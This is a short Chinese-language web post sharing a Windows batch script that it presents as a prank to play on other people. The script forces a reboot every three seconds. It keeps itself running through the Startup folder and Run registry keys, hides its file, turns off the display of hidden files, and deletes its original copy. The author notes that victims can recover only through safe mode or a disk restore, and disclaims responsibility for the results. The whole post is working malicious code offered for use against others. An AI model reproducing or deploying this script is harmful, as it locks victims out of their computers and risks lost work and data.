可以实现反复重启的批处理


我来发几个小东西`````无聊的时候大家给别人玩玩 嘿嘿 玩出事了可别找我

反复重启的批处理 顾名思义 就是让别人启动了再重启 一直反复....废话不多说 看底下的代码

@echo off
shutdown -r -t 3
copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat
copy %0 c:\autoexec.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
attrib autoexec.bat +r +s +h
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
del %0

3秒重启 加入了启动项 开机就会3秒倒计时 嘿嘿 要想不重启了 就到安全模式下或者ghost搞定吧 我可没其他办法

« 
» 
快速导航

Copyright © 2016 phpStudy | 豫ICP备2021030365号-3